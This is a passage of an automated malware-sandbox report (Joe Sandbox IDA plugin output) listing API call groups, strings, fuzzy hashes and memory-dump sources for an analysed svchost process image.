                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 0a567cbdcd35ce77fb9ef5d2f757b24a0b632dea675aeb3ca454db5b1b0a9327
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: E8015B29B00A4092FA94EF92E9A835A63B1FB8CFC0F4840349F8D43755DEBDC995C780
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: c7e426ad3a8663a85c993172cbf675b4bc21cb55f235fc4e2dcdafeb815fee9c
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: A8012D69A1574096FBA8AFA2E9AC71777B1BB4DB45F040434CB4D06366EF7EC458C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: c7868ee6e994c88c368ac7911b9c882d734e1b19883b4664ddc12e81d6a56a24
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 7CF0A42AB04685A2F7A0AFA0F6A835A6371F74CB88F845031DB4942559DFADC668C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: b8b2264c96036f2fd40b0f46cf7ae1827fe0674ee32b204284edde0178c0ef05
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 43F05458F04B80D2EEC46F92FA2815B5274A74CFC0F445030EF1647B1ACEACC445C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: a04504cd0d85b7767a6ae057d92d07373024f35898ec03b55c9c901403f2537f
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 1FF09629A0470161FA94AF94D9A935B2370EB4D7A4F541639DB6A451E6CFACC448C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 8cf9ec95656e8e5e87e39a662f5ad30ac03dab08b7211d00651beb1416509c21
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: E202EA36919B8096EBA4DF55E5A435BB7B0F384794F104435EB8E87B6ADBBCC484CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: e299e2d91b18ef67838866c18cdec6bfca9fe4556afd804b4f662d50e4966460
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: 2D51C239E04610A7E7A8EF96E96865B77B0F388B80F104939DF4A43756DBBCC945C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: d34dbc50e84e899d59484e42c8476de88141fb153c2056850e267d03047b682d
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 0851A439E14611A7E7A8EFA6E96861B73B0F389B80F104938DF4A43755DFB8C845CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: d0868c2d9cf30e478813b9fe480cab2c66c994ec008eb639b9f6d8edd7a6fe81
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 4561CC3A929A4096F7E49FA5E56831BB7B1F388744F100535EB8D43BAADBBCC540CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: b3c1c112d2e11a003287798bdc41f0482b20c7cd380c6116318526b11c9f8f77
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 60113A2AE08740A7FBA4AF61E55825A77B0FB49B80F140436DB4D037A9EBADC944C781
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 7cb284ad2bbe1a30e649e4dd8f8e8b9c1cc85bb7e2b6f127796852b835166346
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: D851D33AF01600AAEB98EF55E1A876E37A1EB54B88F048930DF494778AD7BCC845C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 2519287d322944cfd7feb94d4905a80ad8ecedd1afd163043e9b4c01a4f3e364
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 5A61C13BD04BC491EBA8AF55E55539AB7B0F794B94F044A35EB8813B96CBBCC091CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: c13a4aa0f0c44daca869980378c499b26511675fa44cc9a95517fb1184cc627c
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 5C518E3BD00740ABFBA8AFA1D66835A77B0E354B94F1449359B8947B96C7BCC452CB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 622ab557142c9faff67b5bb53c6bde86df1ea76d362581bbbeddfaa336dc5a18
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 9651A63AA00340D6EBB4AF91E248B5A77B0F394B9AF144135DB4947BD6EBB8C453CB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: ab322a2d4964e99f23f1116aef8ef54fab78dd75f398024ce987d62f44f25bf3
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: B411A519F14B81B2FB94AFA5EA2939B63B4F748740F8108319B4D83696EFACC915C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 65ab33f9e86a3793016190f554dd470263d197bad517fea0e7f9cd5ea5b1132a
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 98D1FF36B14A80A9EB94DFA5D6683DE37B1F349B98F405236CF4D97B9ADA74C006C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 56e8b8fcdf47366c570304169e9c02a7fee4cc887c1613258ea6998d8deb5e52
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 01015736A10B90EAE794EFE6E92814A77B1F78CF80B099035DF4943729DE78D461C740
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000022F4B9328DF), ref: 0000022F4B932A12
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: a05a13cbd6c50fc86814b52849a412da34fb816029a598fb177ae6ce372f8a44
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 1791F63AE10654A5FF98AFA5D6783AE3BB0F34DB88F546139DF0A53686CAB4C445C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 7315c7c0fdf0fd24ccb5326225aca3ef93bf920e04fc4ac136ff2fecd1a1c651
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 64115E2AB10F009AEB80DFA0E9683A933B4F71D758F441E31DB6D427A5DBB8C194C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2775278553.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                            • Associated: 0000000C.00000002.2774016952.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2776885841.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2778034927.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2779343595.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.2780588064.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_22f4b920000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 69b0edfe0cb17288d0b0df2ba938852f381a9f43c30d0951323d7d8a6a24af5e
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: 0071832AE04B4165FFBCAEA6DA683AB77B4F345784F510836DF0947B96DAB8C500C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 9d5e0100f5ffe4596352da2ba97978141a35c5f3890224abb4ce1ccde644c2fd
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: A951D23AB11A05EADB94EF95D54CF6E33B1F344B89F1542319B464778AE7B8D882C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000003.1538492265.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_3_22f4b8f0000_svchost.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
